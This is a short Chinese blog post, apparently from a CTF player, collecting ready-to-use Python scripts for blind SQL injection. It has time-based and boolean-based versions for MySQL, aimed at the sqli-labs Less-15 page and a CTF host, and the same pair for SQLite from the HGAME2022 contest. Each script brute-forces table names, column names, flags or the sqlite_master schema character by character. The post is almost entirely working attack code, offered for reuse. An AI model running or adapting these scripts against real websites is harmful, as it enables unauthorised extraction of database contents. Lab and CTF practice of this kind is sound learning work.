payload盲注脚本

记录一下最近的盲注脚本,给以后用一下啊

MYSQL

时间

import requests
import datetime
import time

url = "http://127.0.0.1:8080/sqli/Less-15/index.php"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = F"?id=1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid}),sleep(5),0) --+"
        # payload = F"?id=1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{i},1))>{mid}),sleep(5),0) --+"
        payload = "admin' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{0},1))>{1}),sleep(2),0)#".format(i,mid)
        post_data = {"uname": payload, "passwd": "admin", "submit": "submit"}
        time1 = datetime.datetime.now()
        r = requests.post(url=url, data=post_data)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 2:
            head = mid + 1
        else:
            tail = mid


    if head != 32:
        result += chr(head)
    else:
        break

    print(result)

布尔

import requests
import time

url = "http://1.14.71.254:28086/index.php"
flag = ''
i = 0

while True:
	i = i + 1
	head = 32
	tail = 127
	mid = (head + tail) // 2

	while head < tail:
		payload = "if((ascii(substr((select(flag)from(flag)),{0},1))>{1}),1,2)".format(i, mid)
		post_data = {"id":payload}
		r = requests.post(url,data=post_data)

		if "Hello" in r.text:
			head = mid + 1
		else:
			tail = mid
		mid = (head + tail) // 2

	if head != 32:
		flag += chr(mid)
		time.sleep(0.5)
	else:
		break

	print(flag)

在HGAME2022的比赛中,使用到了SQLite这个数据库,正好最近看到,也一起记录了

SQLite

布尔:

import requests
url = 'http://localhost:9000/index.php'
flag = ''
for i in range(1,500):
  low = 32
  high = 128
  mid = (low+high)//2
  while(low<high):
      payload = "-1' or substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}'/*".format(i,chr(mid))
      datas = {
          "id": payload
      }
      res = requests.post(url=url,data=datas)

      if 'Username' in res.text:
          low = mid+1
      else:
          high = mid
      mid = (low+high)//2
  if(mid ==32 or mid ==127):
      break
  flag = flag+chr(mid)
  print(flag)

#print('\n'+bytes.fromhex(flag).decode('utf-8'))

时间:

import requests
import time
url = 'http://localhost:9000/index.php'
flag = ''
for i in range(1,500):
  low = 32
  high = 128
  mid = (low+high)//2
  while(low<high):
      payload = "-1' or (case when(substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}') then randomblob(300000000) else 0 end)/*".format(i,chr(mid))
      datas = {
          "id": payload
      }
      start_time=time.time()
      res = requests.post(url=url,data=datas)
      end_time=time.time()
      spend_time=end_time-start_time
      if spend_time>=2:
          low = mid+1
      else:
          high = mid
      mid = (low+high)//2
  if(mid ==32 or mid ==127):
      break
  flag = flag+chr(mid)
  print(flag)

print('\n'+bytes.fromhex(flag).decode('utf-8'))

另外SQLite注入,可以参找这篇文章
SQLite注入

posted @ 2022-03-14 21:45  Freshman0611  阅读(162)  评论(0)    收藏  举报